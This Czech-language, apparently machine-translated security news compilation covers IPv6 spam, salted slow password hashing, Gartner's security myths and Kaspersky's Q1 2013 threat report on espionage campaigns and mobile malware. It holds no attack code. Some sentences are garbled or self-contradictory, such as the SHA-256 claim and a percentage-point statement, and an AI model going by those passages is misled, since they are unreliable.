Pravděpodobně nejčastější IPv6 "útok" Vidím, že je to spam, pravděpodobně omylem (na obou koncích stát podporovat IPv6), ale funguje to docela dobře, neboť existují stále žádný skutečný blok seznam pro IPv6.
5 - Portscans
Zatím vidíme skoro žádné skenování portů na IPv6 (což je docela dobrý ;-)). To je ještě slušný nápad, "schovat" SSH server na IPv6 prostoru.
BTW: Nezapomeňte, že jsme nyní schopni přijmout IPv6 firewall logy, a to nejen IPv4!
Ukládání hesel správný způsob, jak do vaší aplikace
12.6.2013 Šifrování
Mám podezření, že většina našich čtenářů vědí, ale to nemůže ublížit opakovat to každý tak často, jak je zde mnoho nejasností v otázce. Jedna věc, která se dostává do mě vidí zprávy o webových kompromisů, které tvrdí, " hesla byly rozházeny s SHA-256 ". No v nominální hodnotě to znamená, že 90% z hesel bylo dekódovat před zprávou zasaženi.
Pokud máte aplikaci, která je chráněna heslem, existuje několik pravidel následovat:
Pravidlo # 1: Nikdy neskladujte prostého hesla, použijte hash
Nejhorší řešení je, že hesla jsou uloženy jako je. Každý útočník lámání do aplikace má nyní vše, co potřebují k zosobnění všechny uživatele ve vaší aplikaci. Ale obvykle mají mnohem více: uživatelé obvykle znovu hesla, takže nedá se říct, jak daleko to jde. A v případě, že aplikace je např. webmail řešení: a všechny účty, které lze resetovat prostřednictvím e-mailu zde jsou nyní v podstatě rozděleny stejně.
Hash funkce je jednosměrná funkce: převádí vstup na výstup, ale neexistuje žádný jednoduchý způsob, jak zvrátit tento proces. Je tu celá parta běžně používaných algoritmů.
Cílem / Výhodou zde je, že iv případě, že útočník snímá uživatelské tabulky, se mu pořád ještě nějakou práci. Bohužel práce je proveditelné, a proto potřebujeme více ...
Pravidlo č. 2: Použití soli
Útočníci mohou předem vypočítat (nebo koupit) tzv. rainbow tables: Je to seznam předběžně vypočtené heslem -> hodnoty hash a jako takové dekódování všechny běžné heslo je rychlý jako vyhledávání na ně dostane.
Sůl je v podstatě náhodný řetězec vybrán při změně hesla nebo vytvoření a uloženy spolu s hash a spojeny na heslo. To je duha tabulky k ničemu.
Ale pořád to není dost ...
Pravidlo č. 3: Použijte pomalu hash funkce
Toto pravidlo je nejvíce často zapomíná, ale je to tak důležité.
Mezi nejčastější funkce hash, které používáme denně (např. SHA-256) jsou navrženy tak, aby byl rychlý. Ale pro ukládání hesel, který bude fungovat proti nám velký čas. I Útočník nemůže zlomit SHA-512 v hrubou silou způsobem, a to iv případě, že nemohou používat rainbow tables kvůli soli používány, oni ještě najdou převážnou většinu hesel naši uživatelé mohou pamatovat způsobem minut na hodiny, pokud použijete rychlý hash.
Takže budete muset použít delší hash funkce.
Vzhledem k tomu, že je pravidlo číslo 0 ve všech věcech crypto: Ještě nevymysleli sami: Stačí použít příslušné funkce již existuje. Mnohé z těchto pomalých hašovacích funkcí umožňují, kdo si vybral náklady. Pokud ano, nastavte ji tak vysoko, jak můžete mít se svým současným hardwarem.
Příklady
V PHP lze použít šifrovací funkci pomocí blowfish nebo mnoho tisíc kol SHA-256 nebo SHA-512 namísto jednoduchého hash funkce. Nebo ještě lépe, pokud je šifrovací heslo hash rozšíření je nainstalován, použijte ji, jak to má jednoduchý podporu např. omílání hesel aktualizovat sílu hash uložené hesla při přihlášení uživatele.
Neváhejte přidávání komentářů o tom, jak to udělat iv jiných jazycích.
Deset největších bezpečnostních mýtů podle Gartnerů
Analytik agentury Gartner tvrdí, že nepochopení může zhatit i ty nejlepší plány na zabezpečení IT.
Bezpečnost
Když dojde na informační bezpečnost, setkáváme se s mnoho přeháněním a nepochopení, na straně hrozeb i bezpečnostních technologií. Jak říká Jay Heiser, analytik společnosti Gartner, mnoho pochybných tvrzení a předpokladů se již léta traduje i mezi personálem, který je zodpovědný za ochranu dat.
Mýtus 1: „Mně se to nemůže stát.“ Ano, je lehké uvěřit přehnanosti méně příjemných tvrzení a ponechat zaměstnance, at si dělají, co chtějí a kličkují mezi povinnostmi a současně zdůvodňují snížení nákladů na bezpečnost. Řešení: Stačí přistupovat k požadavkům na bezpečnost se stejnou odpovědností, jako by to byl obchodní případ. Hodně také pomůže nasadit nějaký bezpečnostní klasifikační framework.
Mýtus 2: „Bezpečnostní rozpočet je typicky 10 procent z peněz investovaných do IT“ Tak to je zbožné přání. Statistika Gartneru ukazuje spíše hodnoty v okolí 5 procent. Řešení: Stačí se poptat okolo sebe a věřit vlastním očím...
Mýtus 3: „Bezpečnostní rizika mohou být kvantifikována“ V kultuře orientované na čísla, kde „největší číslo vyhrává“, je jednoduché uvěřit, že řádky v Excelu perfektně zdůvodní bezpečnostní rozpočet. Řešení: Připravit nenumerickou prezentaci a vyhodnocení rizik a pokusit se zajistit, aby obchodní oddělení převzalo do vlastnictví i s IT související rizika.
Mýtus 4: „Máme SSL, takže víte, že vaše data jsou v bezpečí“ Ne, to je sázka na magickou stříbrnou kulku. Nákupy bezpečnostních řešení musí odpovídat práci s daty.
Mýtus 5: „Expirační doba hesel a jejich složit sníží rizika“ S hesly jsou problémy vždy, ale jejich lámání není jádrem útoku. Hesla nejsou většinou lámána, ale získávána jiným způsobem.
Mýtus 6: „Vyčlenění bezpečnostní ředitele mimo IT automaticky zajistí dobrou bezpečnost“ Delegace zodpovědnosti jinam neřeší důvod problémů.
Mýtus 7: „Dodržování bezpečnostních praktik je starostí ředitele“ Bezpečnostní program musí stavět na vnitřní kultuře, nikoho hledat oběť, na kterou se vše hodí.
Mýtus 8: „Nakoupením nástroje XY bude vše vyřešeno“ Hledání univerzálního všeléku u výrobců ještě nikdy nic nevyřešilo. Lepší bude začít metodickou analýzou bezpečnostních rizik a mnohaletým bezpečnostním plánem.
Mýtus 9: „Nasazením systému politik bude vše vyřešeno“ To je opět zbožné přání. Je třeba zavést princip zodpovědností a pustit se do bitvy.
Mýtus 10: „Šifrování je nejlepší cestou k ochraně citlivých souborů“ Pokud šifrování funguje, je to skvělé. Ale je třeba získat zkušenosti s kryptografií ještě před tím, než se bude rozhodovat o způsobu nasazování šifrování a zabezpečení přístupových klíčů.
IT hrozby Evolution: Q1 2013
11.6.2013 Analýzy
Q1 v číslech Přehled Cyberespionage a kybernetické zbraně Cílené útoky Mobilní hrozby Statistika On-line hrozeb Místní hrozby Chyby Q1 v číslech Podle KSN údajů produktŧ společnosti Kaspersky Lab zjištěn a neutralizovat 1 345 570 352 hrozby v 1. čtvrtletí 2013. Celkem 22.750 nových úprav škodlivých programů zaměřených na mobilní zařízení byly zjištěny tento uplynulém čtvrtletí - to je více než polovina z celkového počtu zjištěných změn v celém roce 2012. Přibližně 40% využije vidět v prvním čtvrtletí letošního roku cílových zranitelností v produktech Adobe. Téměř 60% všech škodlivých hostitelů jsou umístěny ve třech zemích: USA, Rusko a Nizozemsko. Přehled V prvním čtvrtletí roku 2013 se ukázalo, že je v plném proudu v oblasti IT bezpečnosti. Tato zpráva se bude zabývat nejvýznamnější události.
Cyberespionage a kybernetické zbraně
Red October Na začátku roku společnost Kaspersky Lab vydala významnou zprávu s výsledky studie o globálním cyberespionage akce známý jako Rudý říjen . Tyto útoky cílené různých vládních agentur, diplomatické organizací a firem po celém světě. Analýza souborů a rekonstrukce strukturu útoku trvalo několik měsíců. Nicméně, po pracovně intenzivního studia, jsme byli schopni určit několik klíčových faktů.
Útočníci byli aktivní za posledních pět let. Multifunkční platformu, která se používají jim pomohlo rychle využívat nové, rozšířené moduly pro sběr informací. Aby bylo možné kontrolovat a řídit infikované systémy, které vytvořil více než 60 různých doménových jmen a několik servery hostované v různých zemích. Příkaz sever infrastruktura se skládá z řetězce proxy servery.
Kromě tradičních cílených útoků na pracovních stanicích, Red October je schopen krást data z mobilních zařízení, sběr dat ze síťových zařízení, sběr souborů z USB disků, krást e-mailové databáze z lokálního archivu Outlook nebo ze vzdáleného POP / IMAP serverů, a těžbu soubory z lokálního FTP serveru na Internetu.
MiniDuke V únoru FireEye publikoval analýzu na nový škodlivý program, který proniká do systému pomocí 0-day zranitelnost v aplikaci Adobe Reader (CVE-2013-0640). To se stalo první exploit schopen obejít Acrobat Reader pískoviště. Jedná stáhnout backdoor chtěl ukrást data z infikovaného systému. Po získání příklady tohoto škodlivého programu pro analýzu, dali jsme mu jméno ItaDuke.
Postupem času jsme zjistili několik podobných incidentů, které se zaměřují na samý chyby, jen s různými hrozbami. Škodlivý program používají zločinci byl nazván MiniDuke. Vyšetřování těchto případů byla provedena maďarské Lab společnosti CrySys. MiniDuke Oběti se ukázalo být státní správy se sídlem na Ukrajině, Belgie, Portugalsko, Rumunsko, Česká republika a Irsko, stejně jako výzkumné organizace v Maďarsku, kromě výzkumného ústavu, dvou vědeckých výzkumných center a zdravotnických zařízení v USA. Celkem jsme zjistili 59 obětí ve 23 zemích.
Jednou z nejzajímavějších vlastností útoků MiniDuke byla kombinace hrozby s kód napsaný pomocí komplex, "old school" přístup, a relativně nový, přesto se pokusil-a-pravdivý, zaměřené na využití technologie Adobe Reader zranitelnosti.
Útočníci rozeslal škodlivé dokumenty PDF využívá cílení verze 9 až 11 programu Adobe Reader. Dokumenty obsahovaly informace o semináři o lidských právech (ASEM), zprávy o zahraniční politice Ukrajiny, a plány členských států NATO. Je-li činem byl úspěšný, oběti počítač infiltrována unikátní backdoor, malý na pouhých 20 kb, napsaný v assembleru.
Mezi zločinci používají Twitter v tomto útoku: pro získání C & C adresy serverů a následně stáhnout nové škodlivé moduly, backdoor hledal speciální tweety z dříve vytvořených účtů. Jakmile je infikovaný systém navázání spojení s příkazem serveru, bylo by to začít přijímat šifrované moduly (zadní vrátka) dodávané se soubory ve formátu GIF. Tyto moduly měly relativně jednoduché funkce: kopírování, přesouvání a mazání souborů, vytváření adresářů a stahování nových škodlivých programů.
APT1 V únoru Mandiant vydával velké PDF zprávu o útoky vedené určitým skupina čínských hackerů jít podle jména APT1. Termín APT (Advanced Persistent Threat) je stále Buzz slovo. Ale někdy to se týká hrozeb nebo útoků, které nejsou zrovna "advanced". Nicméně, v případě APT1, "advanced" se bez nadsázky - to kampaně, kterou čínští hackeři ve velkém měřítku a nemělo by se brát na lehkou váhu.
V Mandiant zprávy začíná tím, že APT1 zdá být rozdělení čínské armády. Společnost ani součástí možnou fyzickou adresu pro rozdělení, a odhaduje počet lidí zapojených a infrastruktura používá. Mandiant věří, že APT1 působí od roku 2006, a to v průběhu 6 let se jí podařilo ukrást terabajtů dat z nejméně 141 organizací. Oběť organizace nacházejí především v anglicky mluvících zemích. Není pochyb o tom tyto masivní útoky by nebyly možné bez skutečné podpory ze stovek lidí a rozvinuté, moderní infrastrukturou.
To rozhodně není to poprvé, kdy Čína čelí obvinění z jeho zapojení kybernetickými útoky proti vládním agenturám a organizací v zemích po celém světě. A není nic zvlášť překvapivého čínské vlády pevné odmítnutí tvrzeními v Mandiant zprávě.
Všimněte si, že doposud žádná země nikdy netvrdil, odpovědnost za jakékoliv cyberespionage útoku, nebo se přiznal k účasti na cyberespionage pod tlakem veřejného nebo agentura důkazů.
TeamSpy V březnu 2013 byla zveřejněna informace o nejnovější z řady komplexních útoky na vysoce postavených politiků a obhájců lidských práv v zemích SNS a východní Evropy. Operace byla nazvána " TeamSpy ", jako dálkové admin programu TeamViewer byl používán útočníky ovládat obětí počítačů. Hlavním cílem tohoto útoku bylo shromáždit informace z uživatelských počítačů, počínaje screenshoty a konče kopií. PGP, včetně hesla a šifrovací klíče.
I přesto, že nástroje používané v TeamSpy provozu - a dokonce i samotné operace - nezdálo se, že všechny složité nebo profesionální ve srovnání s provozem červeném říjnu se TeamSpy útoky byly také úspěšné.
Stuxnet 0.5 Případy, které vyžadují měsíce trvalé úsilí, aby prošetřila jsou poměrně vzácné v průmyslu antiviru. Ještě vzácnější jsou události, které zůstávají relevantní i tři roky poté, co se uskuteční - stejně jako detekci Stuxnet, například. Ačkoli tento červ byla studována řadou antivirových firem, stále existuje mnoho modulů, které sotva byly vyšetřeny, pokud vůbec. Je důležité si uvědomit, že tam bylo několik verzí Stuxnet, a to nejdříve z nich se objevila v roce 2009. Odborníci několikrát navrhovalo, že tam byly (nebo ještě jsou) i starší verze tohoto červa, ačkoli tam byl žádný pevný důkaz.
Ale na konci, byly potvrzeny tato tvrzení. V pozdním únoru, Symantec zveřejnila studii o nové "staré" verze červa Stuxnet - 0.5. Tato verze se ukázalo být nejdříve známá modifikace Stuxnet, a byl aktivní v letech 2007 a 2009. Navíc, tato verze měla několik velmi zajímavých vlastností:
Za prvé, byl vytvořen na stejné úrovni, jako plamen, a to stejně jako následné Tilded Stuxnet úprav. Za druhé, červ šíří pomocí infikované soubory generované pomocí Simatic Step 7 a neobsahuje žádné hrdinské činy pro produkty společnosti Microsoft. Za třetí, byl Stuxnet 0.5 již množily po 4.7.2009 . Nakonec to bylo Stuxnet 0.5, který uváděl úplná kompatibilita s PLC (Siemens 417 novějších verzích díla neměl tuto funkci v plném rozsahu). Výsledky studie verzi Stuxnet 0.5 poskytly další informace o tomto škodlivého programu obecně. Je pravděpodobné, že budeme zjistit mnohem více informací v budoucnosti. To samé lze říci o příkladech kybernetické zbraně zjištěných po Stuxnet, stejně jako malware používané v cyberespionage - je tu toho mnoho, co ještě nevím.
Cílené útoky
Útoky proti tibetským a Ujgurů aktivistů V prvním čtvrtletí roku 2013, cílené útoky pokračovaly proti tibetským a ujgurské aktivisty. Za účelem dosažení svých cílů, útočníci použít všechno, co mají k dispozici, a uživatelé Mac OS X, Windows a Android byli vystaveni útokům.
V lednu až únoru, Kaspersky Lab zjištěn podstatný nárůst počtu cílených útoků na Ujgury pomocí Mac OS X. Všechny tyto útoky používal CVE-2009-0562 zranitelnost, která byla opravené Microsoft téměř před čtyřmi lety. Zneužití této chyby zabezpečení byl rozeslán dokumenty MS Office, které byly snadno rozpoznatelné od "kapitána" autor tag. Pokud činem byl úspěšně vykonán, byl backdoor pro Mac OS X ke stažení v podobě Mach-O souboru. Tento malý backdoor má velmi specifickou funkci: instaluje zadní vrátka a další program, který krade osobní údaje (kontakty).
Kaspersky Lab zaznamenala útoky proti aktivistům tibetských v polovině března 2013. Tentokrát útočníci použili exploit je uvedeno výše (CVE-2013-0640 - dříve použito ve ItaDuke útoků) se dostat kolem na pískovišti v Acrobat Reader X a infikovat cílových počítačů.
Na konci března 2013 uživatelé zařízení se systémem Android padly za oběť této vlně útoků. Po schránky na známého aktivisty Tibetu byl hacknutý, zásilky z jeho adresu začal přichází s přílohou soubor APK, což se ukázalo být škodlivý program pro Android (produktŧ společnosti Kaspersky Lab se označovali Backdoor.AndroidOS.Chuli.a ). Tato hrozba se kradmo oznámí příkaz server úspěšné infekce, a pak začne sbírat data uložená na zařízení: kontakty, protokoly volání, textové zprávy, GPS data a informace o zařízení. Pak malware šifruje data pomocí ukradené Base64 a nahrává je do příkazového serveru. Kaspersky Lab vyšetřování příkazu serveru vyplývá, že útočníci mluvit čínsky.
Jen pár dní poté, co výsledky naší studie byly zveřejněny, výzkumná organizace, Citizen Lab publikoval výsledky svého studia podobného incidentu. Cílem útoku byli lidé, kteří byli v jedné cestě nebo jiný spojený s Tibetem nebo tibetských aktivistů a škodlivý program, který byl použit má podobnou funkci (krást osobní informace), ale infikovaný verze posla Talk Kakao.
Hacking podnikové sítě Bohužel, v prvním čtvrtletí tohoto roku se ukázalo být přeplněný incidentů s hacknutý firemních infrastruktur a hesla únikům. Oběti včetně Apple, Facebook, Twitter, a Evernote, mezi ostatními.
Počátkem února Twitter dělal oficiální oznámení, že uživatelé se zlými úmysly se podařilo ukrást uživatelská data (včetně hesel hash) z 250000 členů sociální sítě. O dva týdny později, Facebook vydal prohlášení , že počítače několika z firmy zaměstnanci byli nakaženi využije během návštěv na mobilní vývojáře webu. Facebook popsal jako sofistikované a cílený útok s tím, že cílem bylo proniknout na Facebooku podnikové sítě. Naštěstí, zástupci společnosti uvedl, že Facebook byl schopen, aby se zabránilo úniku informací o uživateli.
Jen o několik dní později, Apple oznámil, že několik zaměstnanců společnosti stal obětí velmi stejného útoku při návštěvě webové stránky pro mobilní vývojáře. Apple data ukázala, že žádná data úniku došlo. Na začátku března, Evernote oznámili, že jejich vnitřní síť byly napadeny hackery a že uživatelé se zlými úmysly se pokusil získat přístup k jejich datům.
V roce 2011 jsme byli svědky hmotnost hacking různých firem a masových úniků uživatelských dat. Mohlo by se zdát, že tyto útoky všichni přišli k ničemu - ale ne tak! Uživatelé se zlými úmysly zůstávají zájem jako dřív v hackerů velkých společností a jak se jejich ruce na důvěrných údajů, včetně informací o uživateli.
Mobilní hrozby
Kaspersky Lab Zpráva o vývoji hrozeb zaměřených na smartphony, tablety a další mobilní zařízení v roce 2012 byla zveřejněna v únoru 2013. Naše data ukazují, že v roce 2012 se stal Android cíl číslo jedna mezi autory virů, a že počet hrozeb v průběhu roku rostl stabilně. Tento vzestup v počtu mobilních hrozeb pokračovaly v roce 2013 tak daleko? Ve skutečnosti to má.
Několik čísel Leden je tradičně tichý měsíc pro mobilní autoři virů - "jen" 1262 nových úprav se objevil v prvním měsíci roku. Ale v posledních několika měsících, společnost Kaspersky Lab zjištěn více než 20.000 nových mobilních malware úprav. V únoru jsme zjistili 12044 mobilní malware úpravy a další 9443 v měsíci březnu. Pro porovnání - celkem 40.059 úprav škodlivých programů zaměřených na mobilní zařízení byly zjištěny v průběhu celého roku 2012.
SMS trojské koně, které zasílají neoprávněným textové zprávy na krátké, prémiová čísla, jsou stále nejrozšířenější kategorie mobilních hrozeb a představují v současnosti 63,6% všech útoků.
Celkem 99,9% nových mobilních hrozeb zjištěných zaměřit na platformu Android.
Podle KSN údajů Top 20 nejčastěji používaných škodlivých nebo potenciálně nežádoucí programy pro Android je:
První místo v uplynulém čtvrtletí jde Trojan-SMS.AndroidOS.FakeInst.a (29,45%). Tato hrozba se zaměřuje především ruskojazyčných uživatelů internetu snaží stáhnout software pro zařízení se systémem Android od pochybných stránek. Často zločinci používají tyto stránky k šíření malware pod rouškou užitečného softwaru.
(18,78%), adware Trojan umístila na druhém místě. Tato hrozba je vidět především v evropských zemích, kde se používá vývojáři svobodného softwaru zpeněžit produkty zobrazováním reklam.
Třetí a čtvrté místo tak šel do SMS trojské koně z rodiny Opfake: Trojan-SMS.AndroidOS.Opfake.a (12.23%) a Trojan-SMS.AndroidOS.Opfake.bo (11.49%). První modifikace Opfake rodiny hrozby byly maskované jako poslední verzi Opery, populární mobilní prohlížeče. Dnes jsou škodlivé programy v této rodině se tváří jako nové verze dalších oblíbených aplikací (Skype, Angry Birds, atd.).
Incidenty Rádi bychom se dotknout dvou nejzajímavějších virových incidentů v prvním čtvrtletí letošního roku:
nová hrozba jít podle jména Perkele nebo Perkel, která loví mTANs, a MTK botnet. Další významnou událostí, která se konala letos v čtvrtletí bylo cílené útoky proti uživatelům, kteří Android se zabývá výše.
Perkel Během prvních dvou týdnů měsíce března, dobře známý novinář Brian Krebs zjistil informace o podzemních ruskojazyčných fórech o o nové bankovní Trojan cílení mobilních zařízení a údajně vliv na uživatele v 69 zemích. Jak říkalo,, nová hrozba již infikovaných nemalé množství zařízení. Krebs navrhl, že tento Trojan byl vytvořen rusky mluvících autory virů, protože kombinace nástrojů použité k jejímu vytvoření, jsou k dispozici na ruskojazyčných fórech.
Tato zpráva přirozeně upozornila odborníků antivirových, ale žádné příklady softwaru jsou k dispozici na chvíli.
O několik dní později, bylo zjištěno, že první modifikace Perkel. Po Kaspersky Lab provádí analýzu, to stalo se jasné, že tam byly některé nové přírůstky do rodiny škodlivých programů, jejichž cílem je ukrást textové zprávy, které obsahují mTANs. Funkce vidět v Perkel rodiny jsou typické pro tuto skupinu, se dvěma výjimkami:
Perkel inklinuje používat textové zprávy spíše než HTTP komunikaci s příkazem serveru a nahrát ukradených dat (kromě textových zpráv s mTANs, hrozba také shromažďuje informace o infikovaných zařízení). Hrozba je schopen provádět samočinné aktualizace stažením nové kopie sebe sama ze vzdáleného serveru. MTK Botnet V polovině ledna, slovo vyšel o existenci botnetu, který infikované až jeden milion zařízení Android vlastnictví především čínských uživatelů. Jak se ukázalo, šíření škodlivého programu v Číně byl u kořene botnet (Kaspersky Lab nazval tento škodlivý program Trojan.AndroidOS.MTK). To se rozšířilo přes neoficiálních čínskými app obchodů s oblíbenými, prasklý hry. Kromě krást informace o infikovaného telefonu, uživatelské kontaktní údaje a zprávy, hrozby v této rodiny humbuk vytvořit řadu aplikací. Chcete-li tak učinit, trojské koně tajně stahovat a instalovat aplikace na oběti mobilním zařízení, a pak dát, že App nejvyšší možný rating v App Store. Pak se informovat o svých akcích na vzdálený server. Počet aplikací pro Android je neustále na vzestupu, a to je často problém získat popularitu s uživateli - což je důvod, proč tyto nelegitimní taktiky jsou stále všechny běžnější.
TurkTrust Certifikáty zrušeno V prvním čtvrtletí roku 2013, jsme viděli ještě další příhodu kořenové certifikáty . Microsoft, Mozilla a Google zrušit dvě kořenové certifikáty vydané TurkTrust certifikační autority, a tím odstranění z jejich prohlížeče databází.
Jak se ukázalo, TurkTrust pustil nadbytečné kořenových certifikátů do dvou organizací v místě typických SSL certifikátů. Ty by mohly být použity, aby se SSL certifikáty pro všechny zdroje na internetu a prohlížeče používané pro přístup k těmto prostředkům by přijímal tyto certifikáty jako "důvěryhodné".
V prosinci, Google zjistil, že jeden z certifikátů vydaných TurkTrust SSL pro *. Se google.com byl zapojený do "man-in-the-middle" typu útoku. Samozřejmě, že skutečnost, že Google byl napaden znamenalo, že osvědčení vydaná stejným způsobem by mohly být zapojeny do útoků proti jiným společnostem.
To poslední v řadě významných událostí souvisejících s kořenových certifikátů a důvěryhodných problémy ukázaly, že ke zneužití oprávněných certifikátů zůstává kritický problém. Nicméně, škodlivý použití těchto typů certifikátů je vždy jen byla zjištěna po tom, jak je v současné době nejsou k dispozici žádné účinné prostředky pro prevenci těchto typů událostí v této době.
Statistika Všechny statistické údaje použité v této zprávě byla získána z cloudové sluţby Kaspersky Security Network (KSN). Statistiky byly získány od uživatelů, kteří souhlasili KSN podělit o své lokální data. Miliony uživatelů produkty společnosti Kaspersky Lab v 213 zemích, se zapojila do celosvětové výměny informací o nebezpečné činnosti.
On-line hrozeb
Statistiky v této části byly odvozeny z webových komponentách antivirový program, který chrání uživatele při škodlivý kód pokusí stáhnout z infikovaných webových stránek. Infikované webové stránky mohou být vytvořeny uživatelů se zlými úmysly nebo by mohly být tvořeny od uživatelů, obsahu (např. fóra) a legitimních zdrojů, které byly pirát.
Detekovatelné on-line hrozeb V prvním čtvrtletí letošního roku společnost Kaspersky Lab řešení neutralizovat 821 379 647 útoky vedené z on-line zdrojů po celém světě.
* Tyto statistiky představují detekce výroky webové antivirového modulu a byly předloženy uživatelé produkty společnosti Kaspersky Lab, kteří souhlasili, aby se podělili o své lokální data. ** Celkový počet jedinečných případů evidovaných webové antivirus na počítačích uživatelů.
První místo v této uplynulém čtvrtletí v Top 20 zjistitelné on-line hrozeb byla opět pořízena zakázaných škodlivých odkazů. Jejich podíl vzrostl o 0,5 pb na ve 4. čtvrtletí 2012 a celkově tyto odkazy představoval 91,4% všech webových detekce antiviru. Mimochodem, používání nástrojů KSN dodat instant aktualizace uživatelských počítačů přes cloud pomohl produktů společnosti Kaspersky Lab zablokovat 6,6% škodlivých odkazů. Tyto odkazy směřují na poslední pirát webové stránky, nebo webové stránky, které byly speciálně vytvořeny uživatelů se zlými úmysly, že uživatelé se začali hojně navštěvovat.
Opět Trojan.Script.Generic (2. místo) a Trojan.Script.Iframer (4.) z Top 5. Tyto hrozby jsou zablokovány při pokusu o drive-by útoky, které jsou jedním z nejběžnějších způsobů, infikovat počítače uživatelů v těchto dnech.
Top 20 představoval Hoax.HTML. FraudLoad.i již několik měsíců, a v 1. čtvrtletí 2013 tato hrozba byla na 15. místě. Tento škodlivý program se setkáváme především uživatelé, kteří stahují filmy, televizní pořady a software z pochybných zdrojů. Hoax.HTML.FraduLoad je detekován na webových stránkách, které uživatelé mohou navštívit údajné stáhnout určitý obsah, ale aby se to podařilo, musí uživatel nejprve odeslat placenou textovou zprávu nebo zadejte své mobilní telefonní číslo vyplňovat placené objednací formulář. Pokud uživatel splňuje všechny požadavky, pak obdrží obsahu, které chtěl buď ve formě textového souboru s návodem k použití vyhledávače, nebo ještě hůře - škodlivý program.
Exploit.Win32.CVE-2011-3402.c byl v 16. ročníku místě tentokrát. Tato hrozba využívá zranitelnost v registru Win32k.sys (Písmo TrueType při analýze zabezpečení). Toto bylo stejné zranitelnost používají k šíření červa Duqu.
Země, kde jsou on-line zdrojů nasazený s malware Tato statistika ukazuje země, ve kterých jsou webové stránky fyzicky nacházejí a které jsou osety škodlivých programů. Aby bylo možné určit zeměpisný původ webovými útoky, byla metoda, kterou se doménová jména neladí skutečných adres doménových IP a pak zeměpisná poloha konkrétní IP adresu (GeoIP) byl založen.
Některé 81% on-line zdrojů používaných k šíření škodlivých programů se nacházejí v 10 zemích světa. Během uplynulých šesti měsíců, že ukazatel se snížil o 5 procentních bodů - 3 procentní body více než v prvním čtvrtletí roku 2013, a o 2 procentní body ve 4. čtvrtletí 2012.
Distribuce on-line zdrojů nasazený škodlivými programy, v 1. čtvrtletí 2013
Tentokrát, Rusko (19%, -6 procentních bodů) a USA (25%, +3 procentní body) opět vyměnili místa v hodnocení z hlediska škodlivých hostingových služeb - USA vyhrál první místo zpět poté, co ztratil to poslední čtvrtletí. Procenta zastoupené v jiných zemích jsou víceméně beze změny od 4. čtvrtletí 2012.
Země, kde uživatelé čelí největší riziko infekce on-line Aby bylo možné posoudit míru rizika pro online infection byly uživatelské počítače čelit v různých zemích, jsme spočítali, jak často uživatelé s produkty společnosti Kaspersky Lab se setkal webových antivirové detekce během prvních tří měsíců roku.
Top 20 zemí * pro on-line rizika infekce ** v 1. čtvrtletí 2013
* Pro účely těchto výpočtů jsme vyřadili zemích, kde počet uživatelů produktů společnosti Kaspersky Lab je relativně malý (méně než 10000). ** Podíl unikátních uživatelů v zemi s počítači se systémem produkty společnosti Kaspersky Lab, které blokovaly internetových hrozeb.
Top 10 zemí, kde se uživatelé setkávají nejčastěji škodlivých programů sotva změnily od posledního čtvrtletí roku 2012 a stále patří země z bývalého Sovětského svazu. Rusko (57%), na třetím místě v seznamu. Nicméně, tam byly některé změny v Top 20: během prvních tří měsíců letošního roku, Tunisko (43,1%) a Alžírsko (39%), jak vstoupil do Top 20. Jedinou západní evropské země, aby v do Top 20 byla Itálie (39,9%, 16. místo).
Ve všech zemích lze rozdělit do čtyř základních skupin.
Maximální riziko : Tato skupina zahrnuje země, kde více než 60% uživatelů se vyskytly malware alespoň jednou v režimu online v průběhu vykazovaného období. V prvních třech měsících roku 2013, Tádžikistán byl osamocený člen této skupiny s 60,4%. Vysoké riziko : Tato skupina zahrnuje země, kde 41 - 60% uživatelů, s nimiž on-line malware alespoň jednou. Během tohoto období, 13 zemí, z Top 20 (stejný počet jako ve 4. čtvrtletí 2012) byly do této kategorie. S výjimkou Vietnamu, Tuniska a na Srí Lance, většina členů této skupiny jsou z bývalého Sovětského svazu, konkrétně Arménie (59,5%), Ruska (57%), Kazachstánu (56,8%), Ázerbájdžánu (56,7%), v Bělorusku (49,9%) a Ukrajina (49%). Střední riziko : Tato skupina zahrnuje země, kde 21 - 40% uživatelů internetu se vyskytly malware - celkem 102 zemí, v 1. čtvrtletí 2013, včetně Itálie (39,9%), Německo (36,6%), Francie (35,8%), v Belgii (33,8% ), Súdán (33,1%), Španělsko (32,5%), Katar (31,9%), USA (31,6%), v Irsku (31,5%), Spojené království (30,2%), Spojené arabské emiráty (28,7%) a Nizozemí ( 26,9%). Nízké riziko : Pouhým 12,5-21% uživatelů setkávají malware během vykazovaného období, tato skupina zahrnovala 28 zemí, které v 1. čtvrtletí 2013 a představoval první řadě afrických zemí, kde internet je stále nerozvinutý. Japonsko (15,6%) a Slovensko (19,9%) byly výjimky.
Riziko infekce on-line po celém světě, Q1 2013
V průměru bylo 39,1% ze všech počítačů připojených k KSN vystaven útoku alespoň jednou v průběhu prvních tří měsíců roku, během surfování po webu. Průměrné procento počítačů napadl v 1. čtvrtletí 2013 vzrostla o 1,5 procentního bodu od 4. čtvrtletí 2012.
Místní hrozby
Tato část zprávy obsahuje analýzu statistik založených na údajích získaných z on-access skeneru a skenování statistik za různé disky, včetně vyměnitelných médií (on-demand skener).
Hrozbách zjištěných v počítačích uživatelů V 1. čtvrtletí 2013, Kaspersky Lab bezpečnostní řešení úspěšně blokovány 490 966 403 nepodařené místní infekce na počítačích uživatelů se účastní systému Kaspersky Security Network.
Tyto statistiky jsou sestavovány z detekce malwaru rozsudky generované on-access a on-demand skener modules v počítačích těchto uživatelů se systémem produkty společnosti Kaspersky Lab, které souhlas s tím, aby předložily své statistické údaje. * Podíl jednotlivých uživatelů, na jejichž počítačích Antivirový modul detekoval tyto objekty jako procento všech jednotlivých uživatelů produkty společnosti Kaspersky Lab, na jejichž počítače škodlivý program byl detekován.
Stejně jako dříve, tři verdikty jsou pevně v čele v tomto top 20.
Škodlivé programy jsou klasifikovány jako DangerousObject.Multi.Generic detekována pomocí technologie cloud umístily na prvním místě v 1. čtvrtletí 2013 s 18,51% (o 1,8 pb ve 4. čtvrtletí 2012). Cloud technologie fungovat, když tam jsou ještě žádné signatury antivirové databáze a žádné heuristiky pro detekci škodlivých programů, ale společnosti Kaspersky Lab je mrak již má k dispozici údaje o ohrožení. To je v podstatě, jak jsou detekovány nejnovější škodlivé programy.
Druhé místo byla pořízena Trojan.Win32.Generic s 16% na základě rozsudků vydaných heuristické analýzy v proaktivní detekci mnoha škodlivých programů. Trojan.Win32.AutoRun.gen (13,6%) byla na třetím místě, a obsahuje škodlivé programy, které používají funkce Autorun.
